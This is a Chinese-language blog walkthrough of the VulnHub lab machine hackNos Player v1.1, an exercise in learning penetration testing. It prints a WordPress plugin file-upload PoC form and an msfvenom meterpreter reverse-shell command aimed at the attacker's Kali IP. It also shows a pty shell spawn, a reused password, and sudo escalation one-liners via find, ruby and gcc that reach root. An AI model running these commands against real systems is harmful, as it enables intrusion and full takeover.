Vulnhub之player-v1.1渗透测试

最新推荐文章于 2023-02-06 22:43:36 发布
最新推荐文章于 2023-02-06 22:43:36 发布
阅读量306 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/115329507
版权

目录

1、靶机概述

Difficulty: Intermediate

Learning: Web Application | Enumerate | Good Enumeration | Privilege Escalation

Overview:

Tested: VirtualBox/VMWare

Virtual Machine: - Format: Virtual Machine Virtualbox OVA

Networking: - DHCP Service: Enabled

twitter @rahul_gehlaut
链接: 靶机地址
kali地址: 192.168.29.131
靶机地址: 192.168.29.134
VMware加载靶机ova文件后,可能会出现获取不到ip地址的情况,若出现此情况,可参考这篇文章:Vulnhub靶机检测不到IP地址

2、信息收集

扫描靶机IP地址。
在这里插入图片描述
扫描靶机开启的端口和服务,可知开启了80和3306端口。
在这里插入图片描述
接着扫描靶机目录
在这里插入图片描述
分别访问这些目录,发现并没有可利用的。
访问主页,查看是否有敏感信息。
在这里插入图片描述
刚打开就是apache的默认页面,在这里发现了目录信息,这个信息成为这个靶机的突破口,继续对该目录进行扫描。
在这里插入图片描述
在这里插入图片描述
到这里发现了wordpress相关目录,于是判断该站点为wordpress搭建站点,于是掏出wpscan进行扫描。

一般碰见wordpress站点,有几种思路可以去考虑。

  1. wpscan枚举用户名,口令,进入后台上传shell

  2. 通过wpscan枚举出相关插件,通过wpscan站点: wpscan查询对应插件版本所具有的漏洞,根据插件的远程命令执行漏洞反弹shell
    首先扫描插件 wpscan --url http://192.168.29.134/g@web --enumerate p,扫描结果显示存在插件"wp-support-plus-responsive-ticket-system",版本为7.1.3
    在这里插入图片描述
    然后扫描用户wpscan --url http://192.168.29.134/g@web --enumerate u,扫描结果显示存在一个用户wp-local和一个链接。
    在这里插入图片描述
    打开此链接,发现一个可疑字符。
    在这里插入图片描述
    尝试进行后台登录,结果登录失败。
    在这里插入图片描述
    此路不通,尝试另一条路,在https://wpscan.com/上搜索可被利用的插件,发现该插件<8.0.8的版本存在漏洞,正好靶场发现的该插件版本是7.1.3,可以使用。
    在这里插入图片描述

在这里插入图片描述

3、获取shell

该漏洞允许上传后缀为phtml,php4,php5等后缀文件,产生原因是由于switch函数中的黑名单列表未覆盖完全,导致可被绕过。之后咱们直接复制漏洞POC修改后,上传shell。

<form method="post" enctype="multipart/form-data" action="http://192.168.29.134/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

使用msfvenom生成shell,msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.29.131 lport=1234 -o test.php
在这里插入图片描述
然后将该test.php文件后缀改为test.phtml。
下面咱们通过刚才的POC,上传shell
在这里插入图片描述
在这里插入图片描述
上传成功,接下来咱们要找到该shell的路径,这里可通过wordpress的目录遍历进行查看,访问http://192.168.29.134/g@web/wp-content/uploads/wpsp/即可查看到shell文件
在这里插入图片描述
然后打开msf准备反弹shell
在这里插入图片描述
msf开启监听,并页面访问刚才上传的shell.
在这里插入图片描述
获取shell,kali和靶机建立连接。
拿到shell第1件事就是获取一个标准shell,可通过以下命令获取python -c 'import pty; pty.spawn("/bin/bash")'
在这里插入图片描述

4、提权

由于获取的web账户权限很低,需要继续获取高权限用户,继而获取root权限。

获取高权限用户

cat /etc/passwd查看一下系统存在的用户
在这里插入图片描述
这里发现有三个用户,前面咱们发现了一个疑似密码字符串:hackNos@9012!!

依次尝试切换,最后成功登录security
在这里插入图片描述

获取root权限

最后就是如何获取root权限,有以下几个思路

sudo -l 查询具有sudo权限命令,然后提权

SUID提权,find / -perm -u=s -type f 2>/dev/null

通过在/etc/passwd添加一个root权限的账户进行提权,find / -writable -type f 2>/dev/null

内核提权

这里使用sudo -l 查询有哪些sudo权限命令
在这里插入图片描述
看来可以通过find进行提权,这里推荐一个网站,可以查询sudo的提权命令,链接:gtfobins
在这里插入图片描述
这里通过sudo -u hackNos-boat find . -exec /bin/sh \;进行提权
在这里插入图片描述
拿到hackNos的权限,下面再次查询sudo -l
在这里插入图片描述
看来可以通过ruby进行提权,搜索ruby的提权命令
在这里插入图片描述
这里通过sudo -u hunter ruby -e 'exec "/bin/sh"'进行提权
在这里插入图片描述
拿到hunter的权限,下面再次查询sudo -l
在这里插入图片描述
继续利用gcc进行提权,搜索gcc的提权命令
在这里插入图片描述
使用sudo gcc -wrapper /bin/sh,-s .进行提权
在这里插入图片描述
获取ROOT权限
获取flag
在这里插入图片描述

Passer798
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-brainfuck(考点:dns/wordpress漏洞/smtp/110pop3/密码学)
冬萍子癸水
04-19 2911
nmap C:\root\Desktop> nmap -A 10.10.10.17 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 09:13 EDT Nmap scan report for 10.10.10.17 Host is up (0.33s latency). Not shown: 995 filtered ports ...
yuvplayer_v1.1.rar
05-19
`yuvplayer_v1.1.rar`提供的工具能够帮助用户便捷地检查和理解这些数据,从而在编码、解码、图像处理等环节进行调试和优化。 安装须知.txt中可能包含了关于如何正确安装和使用YUVPlayer的重要信息。通常,安装步骤...
Vulnhub靶机:HACKNOS_ PLAYER V1.1
LainWith的博客
02-12 1247
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站Getshell提权sudo提权获取所有Flag 介绍 系列: hackNos(此系列共7台) 发布日期:2020年04月10日 难度:初级-中级 Flag : 1个,根用户的root.txt 学习: wordpress 安全测试 远程代码执行 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 信息收集 主机发现 arp-
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 484
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
一次vulnhub靶机渗透 | Player
PeterWuu的博客
04-19 343
算是一个很适合基础选手打的靶机,考察基础知识稍多,拓展思路。好了,开始渗透起来吧! 靶机下载地址:https://www.vulnhub.com/entry/hacknos-player,459/ 第一步:网络配置 该靶机可能会存在无法自动分配IP的情况,所以无法扫描到的情况下需要手动配置获取IP地址 1.首先开机后显示linux系统信息后,按e进入此界面修改指定内容为rw signie init...
Vulnhub:Player-v1.1靶机
qq_43884092的博客
02-06 65
访问80端口发现存在一个目录,wpscan扫描发现存在一个插件,和一个用户:`wp-local`,该插件存在越权,
MX-Player-V1.51+Custom-Codec-v1.49.0 安卓版
11-02
MX Player是一款广受欢迎的安卓平台视频播放器,其V1.51版本配合Custom Codec v1.49.0更新,提供了更为强大的视频播放能力,尤其是对于硬解码的支持,使得用户在观看高清视频时能享受到更为流畅的体验。这款应用在...
PotPlayer-v1.7.18346.0-x64-x86
最新发布
01-14
PotPlayer_v1.7.18346.0_x64_x86
h-player-v2:资源采集站在线播放
02-23
h-player-v2关于h-player-v2 h-player-v2是基于Quasar Framework开发应用程序,通过电子包装,实现hls视频流的在线播放。功能特色支持视频源介绍支持分类浏览与搜索特色多窗口播放模式开始使用# 安装依赖yarn ...
安卓手机软件MXPlayer-v1.38.4-ARM7a- TaverAndrey.rar
10-21
《安卓手机软件MXPlayer v1.38.4 ARM7a - TaverAndrey》 MXPlayer是一款在安卓平台上广受欢迎的多媒体播放器,它的版本号为v1.38.4,专为ARM7a架构的设备优化,由开发者TaverAndrey提供。这个软件在安卓用户中享有...
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 959
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
VulnHub—Os-hackNos-2.1
weixin_39219503的博客
12-27 588
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : Web Applicati...
Vulnhub】Os-hackNos-1
4ut15m's blog
02-14 2763
Description url:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ Flag : 2 Flag first user And second root Learning : exploit | Web Application | Enumeration | Privilege Escalation 信息搜集 目标:19...
vulnhub——XXE练习
怪味巧克力的博客
04-22 591
今天写一个关于vulnhub上的关于XXE漏洞利用的一个靶场练习 0x01 首先肯定得先下载啊,这里我就不多说了,自己到vulnhub官网下载即可(百度搜官网),然后进去后搜索XXE,下载第一个。解压,安装,靶场布置完成。 0x02 首先我们发现,靶机开启以后是要登录,但是本题并没有给我们登录的账号和密码,所以,别想着去登录了(哈哈哈),那怎么办? 你可能会有疑问,我连靶场IP地址都不知道! 那...
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3416
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
Vulnhub之DARKHOLE: 1渗透测试
Bird&Bird
12-07 3230
目录1、靶机概述2、信息收集3、越权操作4、文件上传获取shell5、反弹shell至kali6、获取john用户shell7、获取root权限 1、靶机概述 Description Difficulty: Easy It’s a box for beginners, but not easy, Good Luck Hint: Don’t waste your time For Brute-Force 链接: 靶机下载地址. KALI:192.168.110.128 靶机:192.168.110.136 2
windows系统sql server常见提权方法
Bird&Bird
07-24 2327
目录1、MSSQL概述2、常规使用3、xp_cmdshell提权4、sp_oacreate提权 1、MSSQL概述 MSSQL(MicroSoft SQL Server数据库),是微软开发的关系型数据库管理系统DBMS,是一个较大型的数据库,提供数据库的从服务器到终端的完整的解决方案,数据库管理系统SSMS(SQL Server Managerment Studio),是一个用于建立、使用和维护数据库的集成开发环境。 端口号:1433 SA用户 在搭建时,选择使用SQL Server身份验证会创建SA账户并
PTES标准中的渗透测试阶段(要点)
Bird&Bird
05-24 2109
PTES标准中的渗透测试阶段是用来定义渗透测试过程,并确保客户组织能够以一种标准化的方式来扩展一次渗透测试,而无论是由谁来执行这种类型的评估。该标准将渗透测试过程分为七个阶段,并在每个阶段中定义不同的扩展级别,而选择哪种级别则由被攻击测试的客户组织所决定。 一、前期交互阶段 确定渗透测试范围和目标。 二、情报搜集阶段 使用社交媒体网络、Goo...
易语言aplayerv1.1
10-07
易语言APLayerv1.1是一个用于音频播放的类库。它可以方便地实现在易语言中播放各种音频文件的功能。 在APLayerv1.1中,提供了丰富的接口和方法,使用户可以轻松控制音频的播放、暂停、停止和调节音量等操作。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值